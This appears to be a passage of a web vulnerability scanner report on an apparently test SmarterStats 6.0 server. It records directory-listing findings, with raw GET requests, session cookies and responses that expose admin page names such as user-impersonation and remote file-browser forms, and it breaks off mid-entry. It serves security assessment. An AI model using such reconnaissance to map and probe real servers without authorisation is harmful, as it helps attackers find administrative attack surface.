<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMjU1NDEwNjEyDxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYCAgUPZBYCZg9kFgYCAw9kFgICAQ8WAh4EVGV4dGVkAgUPZBYCAg0PEA8WAh8CBQtSZW1lbWJlciBtZWRkZGQCBw9kFgYCAQ8QZBAVAhRVc2UgQnJvd3NlciBMYW5ndWFnZQdFbmdsaXNoFQIAAmVuFCsDAmdnFgFmZAIDDw8WAh4LTmF2aWdhdGVVUkwFY2h0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPVUmdj02LjAuMzkzMiZsYW5nPWVuLVVTJnBhZ2U9TG9naW5BZG1pbmRkAgcPDxYCHghJbWFnZVVybAUGL3MuZ2lmZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFFmN0bDAwJE1QSCRjaGtBdXRvTG9naW4FF2N0bDAwJEJQSCRidG5FbnRlckNsaWNr6qvEQ8B/6RhNW2k59YbDX/7c+pglBMKB69UMRHLnBLI=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>

<script language="javascript">window.onload = function() { if (document.getElementById('ctl00$MPH$txtSiteId') != null) document.getElementById('ctl00$MPH$txtSiteId').focus(); } </script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <div id="ctl00_UpdatePanel1">
   
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
       <option selected="selected" value="">Use Browser Language</option>
       <option value="en">English</option>

   </select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;U&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dU\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:1px;width:1px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               

                   <script type="text/javascript">
                       $(document).ready(function() {
                           $('select').each(function() {
                               if ($(this).width() > 180) $(this).width(180);
                           });
                       }); </script>

               
           
</div>
       
   

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtSiteId');//]]>
</script>
</form>
</body>
</html>


8. Directory listing  previous  next
There are 73 instances of this issue:

Issue description

Directory listings do not necessarily constitute a security vulnerability. Any sensitive resources within your web root should be properly access-controlled in any case, and should not be accessible by an unauthorised party who happens to know the URL. Nevertheless, directory listings can aid an attacker by enabling them to quickly identify the resources at a given path, and proceed directly to analysing and attacking them.

Issue remediation

There is not usually any good reason to provide directory listings, and disabling them may place additional hurdles in the path of an attacker. This can normally be achieved in two ways:


8.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/

Request

GET /Admin/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:19:57 GMT
Content-Length: 3653
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Admin/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Admin/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Defaults/">Defaults</A>
Thursday, October 07, 2010 01:00 PM 869 <A href="frmAllServiceStatus.aspx">frmAllServiceStatus.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,170 <A href="frmDiagnostics.aspx">frmDiagnostics.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,568 <A href="frmEmailReportSettings.aspx">frmEmailReportSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,771 <A href="frmExtensionSettings.aspx">frmExtensionSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 4,357 <A href="frmGeneralSettings.aspx">frmGeneralSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,141 <A href="frmLicenseDetails.aspx">frmLicenseDetails.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,875 <A href="frmLicenseManager.aspx">frmLicenseManager.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,622 <A href="frmMoveSite.aspx">frmMoveSite.aspx</A>
Thursday, October 07, 2010 01:00 PM 783 <A href="frmReImport.aspx">frmReImport.aspx</A>
Thursday, October 07, 2010 01:00 PM 3,503 <A href="frmReportSettings.aspx">frmReportSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 813 <A href="frmReprocessSite.aspx">frmReprocessSite.aspx</A>
Thursday, October 07, 2010 01:00 PM 3,689 <A href="frmSelfDiagnostic.aspx">frmSelfDiagnostic.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,790 <A href="frmServer.aspx">frmServer.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,214 <A href="frmServers.aspx">frmServers.aspx</A>
Thursday, October 07, 2010 01:00 PM 12,811 <A href="frmSite.aspx">frmSite.aspx</A>
Thursday, October 07, 2010 01:00 PM 5,812 <A href="frmSites.aspx">frmSites.aspx</A>
Thursday, October 07, 2010 01:00 PM 859 <A href="frmVersionInfo.aspx">frmVersionInfo.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,841 <A href="frmViewLogs.aspx">frmViewLogs.aspx</A>
Thursday, October 07, 2010 01:00 PM 5,651 <A href="frmViewReports.aspx">frmViewReports.aspx</A>
Thursday, October 07, 2010 01:00 PM 10,425 <A href="frmWelcome.aspx">frmWelcome.aspx</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="GettingStarted/">GettingStarted</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Popups/">Popups</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/Defaults/

Request

GET /Admin/Defaults/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:20:05 GMT
Content-Length: 1719
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Admin/Defaults/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Admin/Defaults/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/Admin/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 2,695 <A href="frmDefaultSiteSettings.aspx">frmDefaultSiteSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 886 <A href="frmServerDefaults.aspx">frmServerDefaults.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,446 <A href="frmServerPropagation.aspx">frmServerPropagation.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,432 <A href="frmSitePropagation.aspx">frmSitePropagation.aspx</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/GettingStarted/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/GettingStarted/

Request

GET /Admin/GettingStarted/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:23:14 GMT
Content-Length: 1495
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Admin/GettingStarted/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Admin/GettingStarted/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/Admin/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 2,839 <A href="frmGettingStarted.aspx">frmGettingStarted.aspx</A>
Thursday, October 07, 2010 01:00 PM 136 <A href="GettingStartedHandler.ashx">GettingStartedHandler.ashx</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/Popups/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/Popups/

Request

GET /Admin/Popups/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:19:19 GMT
Content-Length: 2466
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Admin/Popups/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Admin/Popups/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/Admin/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,367 <A href="frmActivate.aspx">frmActivate.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,416 <A href="frmEmailReport.aspx">frmEmailReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 828 <A href="frmExportReport.aspx">frmExportReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,985 <A href="frmFtpFileBrowser.aspx">frmFtpFileBrowser.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,310 <A href="frmImpersonateUser.aspx">frmImpersonateUser.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,906 <A href="frmLogLocation.aspx">frmLogLocation.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,251 <A href="frmPopupIISSiteList.aspx">frmPopupIISSiteList.aspx</A>
Thursday, October 07, 2010 01:00 PM 657 <A href="frmPrintPreview.aspx">frmPrintPreview.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,958 <A href="frmRemoteFileBrowser.aspx">frmRemoteFileBrowser.aspx</A>
Thursday, October 07, 2010 01:00 PM 771 <A href="frmServerChange.aspx">frmServerChange.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,028 <A href="frmSitesDeleteLogs.aspx">frmSitesDeleteLogs.aspx</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.5. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/

Request

GET /App_Themes/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:52 GMT
Content-Length: 1432
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 29 <A href="AboutThisFolder.txt">AboutThisFolder.txt</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Default/">Default</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.6. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/

Request

GET /App_Themes/Default/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:00 GMT
Content-Length: 1984
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 206 <A href="ButtonBarIcons.xml">ButtonBarIcons.xml</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Controls/">Controls</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="CSS/">CSS</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Flash/">Flash</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Images/">Images</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Javascript/">Javascript</A>
Thursday, October 07, 2010 01:00 PM 217 <A href="Skin.xml">Skin.xml</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Sounds/">Sounds</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.7. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/

Request

GET /App_Themes/Default/CSS/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:11:32 GMT
Content-Length: 2636
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="BrowserOverrides/">BrowserOverrides</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Error/">Error</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="FileDownload/">FileDownload</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="GettingStarted/">GettingStarted</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Internal/">Internal</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Login/">Login</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Mail/">Mail</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Main/">Main</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Popup/">Popup</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Portal/">Portal</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Print/">Print</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Reporting/">Reporting</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Stats/">Stats</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Track/">Track</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Wizard/">Wizard</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.8. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/BrowserOverrides/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/BrowserOverrides/

Request

GET /App_Themes/Default/CSS/BrowserOverrides/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:02 GMT
Content-Length: 1399
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/BrowserOverrides/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/BrowserOverrides/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 203 <A href="ie6.css">ie6.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.9. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Error/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
